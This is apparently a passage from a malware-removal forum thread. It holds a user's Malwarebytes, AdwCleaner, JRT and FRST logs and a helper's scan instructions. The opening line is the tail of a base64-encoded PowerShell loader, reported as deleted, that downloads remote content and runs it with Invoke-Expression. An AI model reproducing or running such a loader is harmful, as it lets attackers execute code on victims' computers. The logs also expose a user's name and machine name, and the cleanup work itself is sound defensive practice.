0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAOwB9AAoAJABzAGMAPQBSAFEAQgBaAEoARABDACgAWgBSAEkAVgBMAEkAWgBDAFcAWgBGAEwAWABGAEIAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=) -> Deleted
[Suspicious.Path|Tr.Gen1] \{49450373-FEEE-B4D8-F18A-86EC30A422FF} -- C:\ProgramData\{5F6F0F4E-E8C4-B8E5-5392-6D650E5BFB29}\3577CAE2-82DC-7D49-3C8F-3C7CFCD19C8B.exe (/run) -> Deleted
[Suspicious.Path|Tr.Gen1] \{C1EFB248-7644-05E3-D1E7-66E55CB86A44} -- C:\ProgramData\{3419C417-83B2-73BC-E0EC-187B8EED1004}\AE70C747-19DB-70EC-3236-D9A0F56E1161.exe (/run) -> Deleted

¤¤¤ Files : 1 ¤¤¤
[PUP.Gen1][Folder] C:\Program Files (x86)\Lavasoft\Web Companion -> Deleted

¤¤¤ WMI : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST500LT012-1DG142 +++++
--- User ---
[MBR] 1bac05d6d156e6c1cd3cd3ec5cfb729e
[BSP] 163bee8d5d8ba960ad519c4e25db3e95 : Empty|VT.Unknown MBR Code
Partition table:
0 - [MAN-MOUNT] EFI system partition | Offset (sectors): 2048 | Size: 500 MB
1 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 1026048 | Size: 128 MB
2 - Basic data partition | Offset (sectors): 1288192 | Size: 465980 MB
3 - [SYSTEM][MAN-MOUNT] | Offset (sectors): 955615232 | Size: 450 MB
4 - [SYSTEM][MAN-MOUNT] | Offset (sectors): 956536832 | Size: 9881 MB
User = LL1 ... OK
User = LL2 ... OK

 

[RichH]

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 7/3/2017
Scan Time: 7:46 PM
Logfile: mbam-scan-log.txt
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2017.07.03.07
Rootkit Database: v2017.05.27.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 10
CPU: x64
File System: NTFS
User: Herbert Holland

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 277260
Time Elapsed: 45 min, 54 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)

 

[RichH]

# AdwCleaner v6.047 - Logfile created 03/07/2017 at 20:52:40
# Updated on 19/05/2017 by Malwarebytes
# Database : 2017-06-29.3 [Server]
# Operating System : Windows 10 Home (X64)
# Username : Herbert Holland - DESKTOP-47E6V0K
# Running from : C:\Users\Herbert Holland\Desktop\AdwCleaner.exe
# Mode: Clean
# Support : https://www.malwarebytes.com/support



***** [ Services ] *****



***** [ Folders ] *****

[-] Folder deleted: C:\ProgramData\4f8e6d5d-0dd0-4c5b-af7e-d7669672baf5
[-] Folder deleted: C:\ProgramData\e26b0e7f
[-] Folder deleted: C:\ProgramData\f8db8783-89ab-4522-9b0a-a789006eee6f
[-] Folder deleted: C:\ProgramData\fd5b3d4e-9568-4645-b546-7df37e02e2eb
[-] Folder deleted: C:\WINDOWS\SysWOW64\config\systemprofile\AppData\Local\WebDiscoverBrowser
[-] Folder deleted: C:\WINDOWS\SysWOW64\SSL


***** [ Files ] *****



***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****



***** [ Scheduled Tasks ] *****



***** [ Registry ] *****

[-] Key deleted: HKU\S-1-5-21-38309054-1687653055-3029875360-1001\Software\System Healer
[#] Key deleted on reboot: HKCU\Software\System Healer
[#] Key deleted on reboot: [x64] HKCU\Software\System Healer
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\ask.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\cmptch.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\izito.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\static.cmptch.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\utop.it
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.ask.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.izito.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ask.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\cmptch.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\izito.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\static.cmptch.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\utop.it
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.ask.com
[-] Key deleted: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.izito.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\ask.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\cmptch.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\izito.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\static.cmptch.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\utop.it
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.ask.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.izito.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ask.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\cmptch.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\izito.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\static.cmptch.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\utop.it
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.ask.com
[#] Key deleted on reboot: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.izito.com
[-] Value deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [WebDiscoverBrowser]
[-] Value deleted: HKU\S-1-5-21-38309054-1687653055-3029875360-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [Web Companion]
[-] Value deleted: HKU\S-1-5-21-38309054-1687653055-3029875360-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [Interstatnogui]
[-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com
[-] Key deleted: HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
[#] Key deleted on reboot: HKLM\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
[#] Key deleted on reboot: HKLM\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
[-] Key deleted: HKCU\Software\Classes\Applications\interstatnogui.exe
[-] Value deleted: HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION [ByteFence.exe]


***** [ Web browsers ] *****

[-] [C:\Users\Herbert Holland\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: aol.com
[-] [C:\Users\Herbert Holland\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: ask.com


*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [9049 Bytes] - [03/07/2017 20:52:40]
C:\AdwCleaner\AdwCleaner[S0].txt - [9177 Bytes] - [03/07/2017 20:41:27]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [9195 Bytes] ##########

 

[Broni]

Re-run Farbar Recovery Scan Tool (FRST/FRST64) you ran at the very beginning of this topic.

• Double click to run it.
• Make sure you checkmark Addition.txt box.
• Press Scan button.
• Scan will create two logs, FRST.txt and Addition.txt in the same directory the tool is run. Please copy and paste them to your reply.

 

[RichH]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.3 (04.10.2017)
Operating System: Windows 10 Home x64
Ran by Herbert Holland (Administrator) on Mon 07/03/2017 at 21:26:48.91
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 3

Successfully deleted: C:\WINDOWS\system32\Tasks\PCDEventLauncherTask (Task)
Successfully deleted: C:\WINDOWS\system32\Tasks\PCDoctorBackgroundMonitorTask-Retry (Task)
Successfully deleted: C:\WINDOWS\system32\Tasks\PCDoctorBackgroundMonitorTask (Task)



Registry: 0





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Mon 07/03/2017 at 21:31:19.97
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

[RichH]

These apps removed some more infections. (y)

The ransomware has not recurred yet.

 

[RichH]

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 03-07-2017 01
Ran by Herbert Holland (administrator) on DESKTOP-47E6V0K (03-07-2017 23:56:45)
Running from C:\Users\Herbert Holland\Desktop\VirusCleaners
Loaded Profiles: Herbert Holland (Available Profiles: Herbert Holland)
Platform: Windows 10 Home Version 1703 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool:

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Windows (R) Win 7 DDK provider) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AdminService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\1251\g2ax_service.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Waves Audio Ltd.) C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\1251\g2ax_comm_customer.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\1251\g2ax_system_customer.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\1251\g2ax_user_customer.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Dell Inc.) C:\Program Files\Dell\DellDataVault\DDVRulesProcessor.exe
(Dell Inc.) C:\Program Files (x86)\Dell Customer Connect\DCCService.exe
(Dell) C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe
(Dell Inc.) C:\Program Files\Dell\Dell Help & Support\MDLCSvc.exe
(Dell Products, LP.) C:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe
(Dell Inc.) C:\Program Files (x86)\Dell Update\DellUpService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\TXE Components\DAL\jhi_service.exe
(Dell) C:\Program Files\Dell\Dell Product Registration\PRSvc.exe
(Dell Inc.) C:\Program Files\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe
(Dell Inc.) C:\Program Files\Dell\DellDataVault\DDVDataCollector.exe
(Dell Inc.) C:\Program Files\Dell\DellDataVault\DDVCollectorSvcApi.exe
(Dell) C:\Program Files\Dell\Dell Foundation Services\DFS.Common.Agent.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8725248 2015-11-06] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1407744 2015-11-06] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3946600 2015-10-15] (Synaptics Incorporated)
HKLM\...\Run: [QuickSet] => c:\Program Files\Dell\QuickSet\QuickSet.exe [3877936 2015-06-12] (Dell Inc.)
HKLM\...\Run: [WavesSvc] => C:\Program Files\Waves\MaxxAudio\WavesSvc64.exe [717744 2015-11-02] (Waves Audio Ltd.)
HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM-x32\...\Run: [isa] => C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe [330240 2015-02-26] ()
Winlogon\Notify\GoToAssist Express Customer: C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\1251\g2ax_winlogonx64.dll (Citrix Systems, Inc.)
GroupPolicy: Restriction <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.100.1
Tcpip\Parameters: [NameServer] 8.8.8.8,8.8.8.4
Tcpip\..\Interfaces\{b2819a59-050d-46e7-bac8-ef33e380672f}: [DhcpNameServer] 192.168.100.1
Tcpip\..\Interfaces\{bafee63c-6366-43b0-ae6c-7237f2573316}: [DhcpNameServer] 172.91.1.171

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131411833229247423&GUID=D4471B74-5BE9-4FE5-BB28-9C0D0DEF4147
HKU\S-1-5-21-38309054-1687653055-3029875360-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131411833231295883&GUID=D4471B74-5BE9-4FE5-BB28-9C0D0DEF4147
HKU\S-1-5-21-38309054-1687653055-3029875360-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://dell15.msn.com/?pc=DCTE
SearchScopes: HKLM -> DefaultScope {DD8B0B28-687B-4D7A-B8EC-13E3CD3824F7} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM -> {DD8B0B28-687B-4D7A-B8EC-13E3CD3824F7} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM-x32 -> DefaultScope {DD8B0B28-687B-4D7A-B8EC-13E3CD3824F7} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM-x32 -> {DD8B0B28-687B-4D7A-B8EC-13E3CD3824F7} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-38309054-1687653055-3029875360-1001 -> DefaultScope {DD8B0B28-687B-4D7A-B8EC-13E3CD3824F7} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-38309054-1687653055-3029875360-1001 -> {DD8B0B28-687B-4D7A-B8EC-13E3CD3824F7} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2017-06-18] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2017-06-18] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-06-18] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-06-18] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-06-18] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-06-18] (Microsoft Corporation)

FireFox:
========
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.56 -> C:\Program Files (x86)\Intel\TXE Components\IPT\npIntelWebAPIIPT.dll [2014-07-02] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\TXE Components\IPT\npIntelWebAPIUpdater.dll [2014-07-02] (Intel Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-05-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-30] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-30] (Google Inc.)
FF Plugin HKU\S-1-5-21-38309054-1687653055-3029875360-1001: @citrixonline.com/appdetectorplugin -> C:\Users\Herbert Holland\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2017-06-13] (Citrix Online)

Chrome:
=======
CHR DefaultSearchURL: Default -> hxxp://srch.bar/{searchTerms}
CHR DefaultSuggestURL: Default -> hxxp://srch.bar/?s={searchTerms}
CHR Profile: C:\Users\Herbert Holland\AppData\Local\Google\Chrome\User Data\Default [2017-07-03]
CHR Extension: (Google Slides) - C:\Users\Herbert Holland\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-08-21]
CHR Extension: (Google Docs) - C:\Users\Herbert Holland\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-08-21]
CHR Extension: (Google Drive) - C:\Users\Herbert Holland\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-08-21]
CHR Extension: (YouTube) - C:\Users\Herbert Holland\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-08-21]
CHR Extension: (Google Sheets) - C:\Users\Herbert Holland\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-08-21]
CHR Extension: (Google Docs Offline) - C:\Users\Herbert Holland\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-12-09]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Herbert Holland\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-06-05]
CHR Extension: (Gmail) - C:\Users\Herbert Holland\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-08-21]
CHR Extension: (Chrome Media Router) - C:\Users\Herbert Holland\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-07-03]
CHR HKLM\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-38309054-1687653055-3029875360-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AtherosSvc; C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\adminservice.exe [323152 2015-06-07] (Windows (R) Win 7 DDK provider)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [4122816 2017-06-10] (Microsoft Corporation)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-18] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-18] (Dropbox, Inc.)
R2 DDVCollectorSvcApi; C:\Program Files\Dell\DellDataVault\DDVCollectorSvcApi.exe [206712 2017-06-20] (Dell Inc.)
R2 DDVDataCollector; C:\Program Files\Dell\DellDataVault\DDVDataCollector.exe [3296632 2017-06-20] (Dell Inc.)
R2 DDVRulesProcessor; C:\Program Files\Dell\DellDataVault\DDVRulesProcessor.exe [217464 2017-06-20] (Dell Inc.)
R2 Dell Customer Connect; C:\Program Files (x86)\Dell Customer Connect\DCCService.exe [130936 2016-12-21] (Dell Inc.)
R2 Dell Foundation Services; C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe [97616 2017-01-11] (Dell)
R2 Dell Help & Support; C:\Program Files\Dell\Dell Help & Support\MDLCSvc.exe [77648 2016-12-22] (Dell Inc.)
R2 DellUpdate; C:\Program Files (x86)\Dell Update\DellUpService.exe [228216 2016-01-21] (Dell Inc.)
R2 GoToAssist Remote Support Customer; C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\1251\g2ax_service.exe [607240 2017-06-13] (Citrix Systems, Inc.)
R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [350312 2015-09-09] (Intel Corporation)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [881152 2015-05-22] (Intel(R) Corporation)
S3 Intel(R) Security Assist; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe [330240 2015-02-26] () [File not signed]
S2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe [7680 2015-02-26] () [File not signed]
R2 jhi_service; C:\Program Files (x86)\Intel\TXE Components\DAL\jhi_service.exe [174368 2015-04-21] (Intel Corporation)
R2 Product Registration; c:\Program Files\Dell\Dell Product Registration\PRSvc.exe [47144 2017-04-06] (Dell)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [307456 2015-11-06] (Realtek Semiconductor)
R2 SupportAssistAgent; C:\Program Files\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe [52696 2017-06-28] (Dell Inc.)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246376 2015-10-15] (Synaptics Incorporated)
R2 WavesSysSvc; C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe [578480 2015-09-25] (Waves Audio Ltd.)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

